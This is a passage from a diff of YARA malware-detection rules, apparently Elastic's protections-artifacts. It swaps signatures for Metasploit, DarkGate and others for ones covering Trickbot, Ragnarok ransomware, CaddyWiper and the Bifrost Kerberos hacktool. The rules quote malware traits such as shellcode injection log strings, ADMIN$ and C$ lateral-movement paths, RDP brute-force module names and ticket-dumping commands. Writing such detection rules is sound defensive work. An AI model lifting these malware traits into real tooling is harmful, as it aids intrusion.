) failed" ascii fullword + $a2 = "[INJECT] inject_via_remotethread_wow64: VirtualAlloc pExecuteX64 failed" ascii fullword + $a3 = "%SystemRoot%\\system32\\stsvc.exe" ascii fullword + $a4 = "[INJECT] inject_via_remotethread_wow64: pExecuteX64=0x%08p, pX64function=0x%08p, ctx=0x%08p" ascii fullword + $a5 = "DLL and target process must be same architecture" ascii fullword + $a6 = "[INJECT] inject_via_remotethread_wow64: VirtualAlloc pX64function failed" ascii fullword + $a7 = "%SystemDrive%\\stsvc.exe" ascii fullword + $a8 = "Wrote shellcode to 0x%x" ascii fullword + $a9 = "ERROR: %d, line - %d" wide fullword + $a10 = "[INJECT] inject_via_remotethread_wow64: Success, hThread=0x%08p" ascii fullword + $a11 = "GetProcessPEB:EXCEPT" wide fullword + $a12 = "Checked count - %i, connected count %i" wide fullword + $a13 = "C:\\%s\\%s C:\\%s\\%s" ascii fullword + $a14 = "C:\\%s\\%s" ascii fullword + $a15 = "%s\\ADMIN$\\stsvc.exe" wide fullword + $a16 = "%s\\C$\\stsvc.exe" wide fullword + $a17 = "Size - %d kB" ascii fullword + $a18 = "yesyes" ascii fullword + $a9 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide fullword condition: - all of them + 5 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_66140F58 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_91516Cf4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" + description = "Generic signature used to identify Trickbot module usage" author = "Elastic Security" - id = "66140f58-1815-4e21-8544-24fed74194f1" - date = "2022-08-15" - modified = "2022-09-29" + id = "91516cf4-c826-4d5d-908f-e1c0b3bccec5" + date = "2021-03-30" + modified = "2021-08-31" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L270-L288" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01a0c5630fbbfc7043d21a789440fa9dadc6e4f79640b370f1a21c6ebf6a710a" - logic_hash = "0a855b7296f7cea39cc5d57b239d3906133ea43a0811ec60e4d91765cf89aced" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L874-L896" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6cd0d4666553fd7184895502d48c960294307d57be722ebb2188b004fc1a8066" + logic_hash = "6c0bdd6827bebb337c0012cdb6e931cd96ce2ad61f3764f288b96ff049b2d007" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "79879b2730e98f3eddeca838dff438d75a43ac20c0da6a4802474ff05f9cc7a3" - severity = 100 + fingerprint = "2667c7181fb4db3f5765369fc2ec010b807a7bf6e2878fc42af410f036c61cbe" + threat_name = "Windows.Trojan.Trickbot" + severity = 80 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 } + $a1 = "" ascii wide + $a2 = "" ascii wide + $a3 = "" ascii wide + $a4 = "" ascii wide condition: all of them } -rule ELASTIC_Windows_Trojan_Metasploit_2092C42A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Be718Af9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" + description = "Targets permadll module used to fingerprint BIOS/firmaware data" author = "Elastic Security" - id = "2092c42a-793b-4b0e-868b-9a39c926f44c" - date = "2023-05-09" - modified = "2023-06-13" + id = "be718af9-5995-4ae2-ba55-504e88693c96" + date = "2021-03-30" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L290-L309" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e47d88c11a89dcc84257841de0c9f1ec388698006f55a0e15567354b33f07d3c" - logic_hash = "83c46c6b957f10d406ea9985c518eb2fba3e82b9023bfdefa8bdd4be7fb67826" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L898-L921" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1f1bc58456cff7413d7234e348d47a8acfdc9d019ae7a4aba1afc1b3ed55ffa" + logic_hash = "d020f7d1637fc4ee3246e97c9acae0be1782e688154bd109f53f807211beebd7" score = 75 - quality = 73 + quality = 25 tags = "FILE, MEMORY" - fingerprint = "4f17bfb02d3ac97e48449b6e30c9b07f604c13d5e12a99af322853c5d656ee88" + fingerprint = "047b1c64b8be17d4a6030ab2944ad715380f53a8a6dd9c8887f198693825a81d" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99996,29 +100477,33 @@ rule ELASTIC_Windows_Trojan_Metasploit_2092C42A : FILE MEMORY os = "windows" strings: - $a1 = { 65 6E 61 62 6C 65 5F 6B 65 79 62 6F 61 72 64 5F 69 6E 70 75 74 } - $a2 = { 01 04 10 49 83 C2 02 4D 85 C9 75 9C 41 8B 43 04 4C 03 D8 48 } + $a1 = "user_platform_check.dll" ascii fullword + $a2 = "yes" ascii fullword + $a3 = "DDEADFDEEEEE" + $a4 = "\\`Ruuuuu_Exs|_" ascii fullword + $a5 = "\"%pueuu%" ascii fullword condition: - all of them + 3 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_46E1C247 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_F8Dac4Bc : FILE MEMORY { meta: - description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" + description = "Targets rdpscan module used to bruteforce RDP" author = "Elastic Security" - id = "46e1c247-1ebb-434f-835f-faf421b35169" - date = "2023-05-10" - modified = "2023-06-13" + id = "f8dac4bc-2ea1-4733-a260-59f3cae2eba8" + date = "2021-03-30" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L311-L330" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ef70e1faa3b1f40d92b0a161c96e13c96c43ec6651e7c87ee3977ed07b950bab" - logic_hash = "760a4e28e312a7d744208dc833ffad8d139ce7c536b407625a7fb0dff5ddb1d1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L923-L954" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "13d102d546b9384f944f2a520ba32fb5606182bed45a8bba681e4374d7e5e322" + logic_hash = "d4536aac0ee402abcb87826e45c892d6f39562bc1e39b72ae8880dc077f230d9" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6cd37d32976add38d7165f8088f38f4854b59302d6adf20db5c46cd3e8c7d9e7" + fingerprint = "256daf823f6296ae02103336817dec565129a11f37445b791b2f8e3163f0c17f" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100026,29 +100511,40 @@ rule ELASTIC_Windows_Trojan_Metasploit_46E1C247 : FILE MEMORY os = "windows" strings: - $a1 = { 73 74 64 61 70 69 5F 66 73 5F 66 69 6C 65 } - $a2 = { 85 D2 74 0E 8B F3 2B 75 F8 8A 01 88 04 0E 41 4A 75 F7 0F B7 } + $a1 = "rdpscan.dll" ascii fullword + $a2 = "F:\\rdpscan\\Bin\\Release_nologs\\" + $a3 = "Cookie: %s %s" wide fullword + $a4 = "<" + $a5 = "<" + $a6 = "X^Failed to create a list of contr" ascii fullword + $a7 = "rdp/domains" wide fullword + $a8 = "Your product name" wide fullword + $a9 = "rdp/over" wide fullword + $a10 = "rdp/freq" wide fullword + $a11 = "rdp/names" wide fullword + $a12 = "rdp/dict" wide fullword + $a13 = "rdp/mode" wide fullword condition: - all of them + 4 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_B62Aac1E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_9C0Fa8Fe : FILE MEMORY { meta: - description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "b62aac1e-2ce8-4803-90ee-138b509e814d" - date = "2023-05-10" - modified = "2023-06-13" + id = "9c0fa8fe-8d5f-4581-87a0-92a4ed1b32b3" + date = "2021-07-13" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L332-L351" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "af9af81f7e46217330b447900f80c9ce38171655becb3b63e51f913b95c71e70" - logic_hash = "3ef6b7fb258b060ae00b060dbf9b07620f8cda0d9a827985bbb3ed9617969ef6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L956-L974" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f528c3ea7138df7c661d88fafe56d118b6ee1d639868212378232ca09dc9bfad" + logic_hash = "23aebc3139c34ecd609db7920fa0d5e194173409e1862555e4c468dad6c46299" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "58340ea67e2544d22adba3317350150c61c84fba1d16c7c9f8d0c626c3421296" + fingerprint = "bd49ed2ee65ff0cfa95efc9887ed24de3882c5b5740d0efc6b9690454ca3f5dc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100056,29 +100552,28 @@ rule ELASTIC_Windows_Trojan_Metasploit_B62Aac1E : FILE MEMORY os = "windows" strings: - $a1 = { 42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C } - $a2 = { CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3 } + $a = { 74 19 48 85 FF 74 60 8B 46 08 39 47 08 76 6A 33 ED B1 01 B0 01 } condition: all of them } -rule ELASTIC_Windows_Trojan_Metasploit_47F5D54A : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ragnarok_1Cab7Ea1 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" + description = "Identifies RAGNAROK ransomware" author = "Elastic Security" - id = "47f5d54a-2578-4bbd-b157-8b225f6d34b3" - date = "2023-11-13" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L353-L372" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bc3754cf4a04491a7ad7a75f69dd3bb2ddf0d8592ce078b740d7c9c7bc85a7e1" - logic_hash = "be080d0aae457348c4a02c204507a8cb14d1728d1bc50d7cf12b577aa06daf9f" + id = "1cab7ea1-8d26-4478-ab41-659c193b5baa" + date = "2020-05-03" + modified = "2021-08-23" + reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ragnarok.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8bae3ea4304473209fc770673b680154bf227ce30f6299101d93fe830da0fe91" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "b6dbc1b273bc9a328d5c437d11db23e8f1d3bf764bb624aa4f552c14b3dc5260" + quality = 73 + tags = "BETA, FILE, MEMORY" + fingerprint = "e2a8eabb08cb99c4999e05a06d0d0dce46d7e6375a72a6a5e69d718c3d54a3ad" + threat_name = "Windows.Ransomware.Ragnarok" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100086,29 +100581,28 @@ rule ELASTIC_Windows_Trojan_Metasploit_47F5D54A : FILE MEMORY os = "windows" strings: - $a32 = { 89 45 F8 FF 15 [11] 8B D8 85 DB 74 76 6A 00 6A 04 6A 00 FF 35 [4] 6A 00 6A 00 FF 15 } - $a64 = { 48 89 7C 24 48 FF 15 [4] 33 D2 44 8B C0 B9 40 00 10 00 FF 15 [4] 48 8B F8 48 85 C0 74 55 48 8B 15 [10] 4C 8B C0 48 8B CB 48 C7 44 24 20 } + $c1 = ".ragnarok" ascii wide fullword condition: - any of them + 1 of ($c*) } -rule ELASTIC_Windows_Trojan_Darkgate_Fa1F1338 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ragnarok_7E802F95 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Darkgate (Windows.Trojan.DarkGate)" + description = "Identifies RAGNAROK ransomware" author = "Elastic Security" - id = "fa1f1338-c920-4db9-a7ec-cd11d7e1558b" - date = "2023-12-14" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DarkGate.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1fce9ee9254dd0641387cc3b6ea5f6a60f4753132c20ca03ce4eed2aa1042876" - logic_hash = "d5447a57fc57af52c263b84522346a3e94a464a698de8be77eab3b56156164f2" + id = "7e802f95-964e-4dd9-a5d1-13a6cd73d750" + date = "2020-05-03" + modified = "2021-08-23" + reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ragnarok.yar#L22-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8f293cdbdc3c395e18c304dfa43d0dcdb52b18bde5b5d084190ceec70aea6cbd" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "182481e23eb10f0a8b7d0d536e2d8d36ab5e51fd798caebff4d38d55b5549244" + tags = "BETA, FILE, MEMORY" + fingerprint = "c62b3706a2024751f1346d0153381ac28057995cf95228e43affc3d1e4ad0fad" + threat_name = "Windows.Ransomware.Ragnarok" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100116,30 +100610,29 @@ rule ELASTIC_Windows_Trojan_Darkgate_Fa1F1338 : FILE MEMORY os = "windows" strings: - $str0 = "DarkGate has recovered from a Critical error" - $str1 = "Executing DarkGate inside the new desktop..." - $str2 = "Restart Darkgate " + $d1 = { 68 04 94 42 00 FF 35 A0 77 43 00 } + $d2 = { 68 90 94 42 00 FF 35 A0 77 43 00 E8 8F D6 00 00 8B 40 10 50 } condition: - 2 of them + 1 of ($d*) } -rule ELASTIC_Windows_Trojan_Darkgate_07Ef6F14 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ragnarok_Efafbe48 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Darkgate (Windows.Trojan.DarkGate)" + description = "Identifies RAGNAROK ransomware" author = "Elastic Security" - id = "07ef6f14-4eb5-4c15-94af-117c68106104" - date = "2023-12-14" - modified = "2024-02-08" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DarkGate.yar#L23-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1fce9ee9254dd0641387cc3b6ea5f6a60f4753132c20ca03ce4eed2aa1042876" - logic_hash = "2820286b362b107fc7fc3ec8f1a004a7d7926a84318f2943f58239f1f7e8f1f0" + id = "efafbe48-7740-4c21-b585-467f7ad76f8d" + date = "2020-05-03" + modified = "2021-08-23" + reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ragnarok.yar#L44-L71" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c9d203620e0e6e04d717595ca70a5e5efa74abfc11e4e732d729caab2d246c27" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "fd0aab53bddd3872147aa064a571d118cc00a6643d72c017fe26f6e0d19288e1" + tags = "BETA, FILE, MEMORY" + fingerprint = "a1535bc01756ac9e986eb564d712b739df980ddd61cfde5a7b001849a6b07b57" + threat_name = "Windows.Ransomware.Ragnarok" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100147,120 +100640,137 @@ rule ELASTIC_Windows_Trojan_Darkgate_07Ef6F14 : FILE MEMORY os = "windows" strings: - $binary0 = { 8B 04 24 0F B6 44 18 FF 33 F8 43 4E } - $binary1 = { 8B D7 32 54 1D FF F6 D2 88 54 18 FF 43 4E } + $a1 = "cmd_firewall" ascii fullword + $a2 = "cmd_recovery" ascii fullword + $a3 = "cmd_boot" ascii fullword + $a4 = "cmd_shadow" ascii fullword + $a5 = "readme_content" ascii fullword + $a6 = "readme_name" ascii fullword + $a8 = "rg_path" ascii fullword + $a9 = "cometosee" ascii fullword + $a10 = "&prv_ip=" ascii fullword condition: - all of them + 6 of ($a*) } -rule ELASTIC_Linux_Trojan_Snowlight_F5C83D35 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ragnarok_5625D3F6 : BETA FILE MEMORY { meta: - description = "Detects Linux Trojan Snowlight (Linux.Trojan.Snowlight)" + description = "Identifies RAGNAROK ransomware" author = "Elastic Security" - id = "f5c83d35-aaa5-4356-b4e7-93dc19c0c6b1" - date = "2024-05-16" - modified = "2024-06-12" - reference = "https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Snowlight.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7d6652d8fa3748d7f58d7e15cefee5a48126d0209cf674818f55e9a68248be01" - logic_hash = "fef8f44e897a0f453be2f84d28886d27e261f8256c53c0425c5265b138ce5f40" + id = "5625d3f6-7071-4a09-8ddf-faa2d081b539" + date = "2020-05-03" + modified = "2021-08-23" + reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ragnarok.yar#L73-L95" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8c22cf9dfbeba7391f6d2370c88129650ef4c778464e676752de1d0fd9c5b34e" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "89adbef703bec7c41350e97141d414535f5935c6c6957a0f8b25e07f405ea70e" + tags = "BETA, FILE, MEMORY" + fingerprint = "5c0a4e2683991929ff6307855bf895e3f13a61bbcc6b3c4b47d895f818d25343" + threat_name = "Windows.Ransomware.Ragnarok" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 48 83 EC 08 48 8B 05 A5 07 20 00 48 85 C0 74 05 E8 BB 00 00 00 48 83 C4 08 C3 00 00 00 00 00 00 FF 35 9A 07 20 00 FF 25 9C 07 20 00 0F 1F 40 00 FF 25 9A 07 20 00 68 00 00 00 00 E9 E0 FF FF FF } + $b1 = "prv_ip" ascii fullword + $b2 = "%i.%i.%i" ascii fullword + $b3 = "pub_ip" ascii fullword + $b4 = "cometosee" ascii fullword condition: - all of them + all of ($b*) } -rule ELASTIC_Windows_Vulndriver_Ryzen_7Df5A747 : FILE +rule ELASTIC_Windows_Wiper_Caddywiper_484Bd98A : FILE MEMORY { meta: - description = "Name: AMDRyzenMasterDriver.sys, Version: 1.5.0.0" + description = "Detects Windows Wiper Caddywiper (Windows.Wiper.CaddyWiper)" author = "Elastic Security" - id = "7df5a747-d924-459d-8363-9c12841ef37f" - date = "2022-04-07" - modified = "2022-04-07" + id = "484bd98a-543f-42de-a58c-fe9c7b5605a3" + date = "2022-03-14" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Ryzen.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433" - logic_hash = "192b51f0bbd2cab4c1d3da6f82fbee7129a53abaa6e8769d3681821112017824" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Wiper_CaddyWiper.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea" + logic_hash = "f473673afc211b02328f4e9d88e709acd95bf4b1fa565f5aca972b92324bf589" score = 75 quality = 75 - tags = "FILE" - fingerprint = "1bf5d6b2739ce4fe5137cff84e7bfb9389e8d175480094fe831f8f68d84abb16" - threat_name = "Windows.VulnDriver.Ryzen" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "de16515a72cd1f7b4d7ee46a4fafde07cf224c2b6df9037bcd20ab4d39181fa8" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 52 00 79 00 7A 00 65 00 6E 00 4D 00 61 00 73 00 74 00 65 00 72 00 44 00 72 00 69 00 76 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x05][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x04][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a1 = { C6 45 AC 43 C6 45 AD 3A C6 45 AE 5C C6 45 AF 55 C6 45 B0 73 C6 45 B1 65 C6 45 B2 72 C6 45 B3 73 } + $a2 = { C6 45 E0 44 C6 45 E1 3A C6 45 E2 5C } + $a3 = { C6 45 9C 6E C6 45 9D 65 C6 45 9E 74 C6 45 9F 61 C6 45 A0 70 C6 45 A1 69 C6 45 A2 33 C6 45 A3 32 } + $s1 = "DsRoleGetPrimaryDomainInformation" condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Vulndriver_Ryzen_9B01C718 : FILE +rule ELASTIC_Macos_Hacktool_Bifrost_39Bcbdf8 : FILE MEMORY { meta: - description = "Name: AMDRyzenMasterDriver.sys, Version: <= 1.7.0.0" + description = "Detects Macos Hacktool Bifrost (MacOS.Hacktool.Bifrost)" author = "Elastic Security" - id = "9b01c718-ba36-4642-b27d-e9310d05d8a5" - date = "2023-01-22" - modified = "2023-06-13" + id = "39bcbdf8-86dc-480e-8822-dc9832bb9b55" + date = "2021-10-12" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Ryzen.yar#L23-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bb82d8c29127955d58dff58978605a9daa718425c74c4bce5ae3e53712909148" - logic_hash = "5734f6a249656f22a2a363b42ae77b5e6b7673bc96bad34b04b1be7f2b584b08" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Hacktool_Bifrost.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e2b64df0add316240b010db7d34d83fc9ac7001233259193e5a72b6e04aece46" + logic_hash = "a2ff4f1aca51e80f2b277e9171e99a80a75177d1d17d487de2eb8872832cb0d5" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "18ad3df5ae549dddbe1f6f33db534b4fcfc603e0863f8262a8cb9c166a16af67" - threat_name = "Windows.VulnDriver.Ryzen" - severity = 49 + quality = 25 + tags = "FILE, MEMORY" + fingerprint = "e11f6f3a847817644d40fee863e168cd2a18e8e0452482c1e652c11fe8dd769e" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 52 00 79 00 7A 00 65 00 6E 00 4D 00 61 00 73 00 74 00 65 00 72 00 44 00 72 00 69 00 76 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x07][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x06][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $s1 = "[dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove | asklkdcdomain]" fullword + $s2 = "[-] Error in parseKirbi: %s" + $s3 = "[-] Error in parseTGSREP: %s" + $s4 = "genPasswordHashPassword:Length:Enc:Username:Domain:Pretty:" + $s5 = "storeLKDCConfDataFriendlyName:Hostname:Password:CCacheName:" + $s6 = "bifrostconsole-" + $s7 = "-kerberoast" + $s8 = "asklkdcdomain" + $s9 = "askhash" condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $original_file_name and $version + 3 of them } -rule ELASTIC_Linux_Trojan_Psybnc_563Ecb11 : FILE MEMORY +rule ELASTIC_Linux_Downloader_Generic_0Bd15Ae0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" + description = "Detects Linux Downloader Generic (Linux.Downloader.Generic)" author = "Elastic Security" - id = "563ecb11-e215-411f-8583-7cb7b2956252" + id = "0bd15ae0-e4fe-48a9-84a6-f8447b467651" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Psybnc.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f77216b169e8d12f22ef84e625159f3a51346c2b6777a1fcfb71268d17b06d39" - logic_hash = "b93e6ab097ccd4c348d228a48df098594e560e62256bfe019669ca9488221214" + source_url = 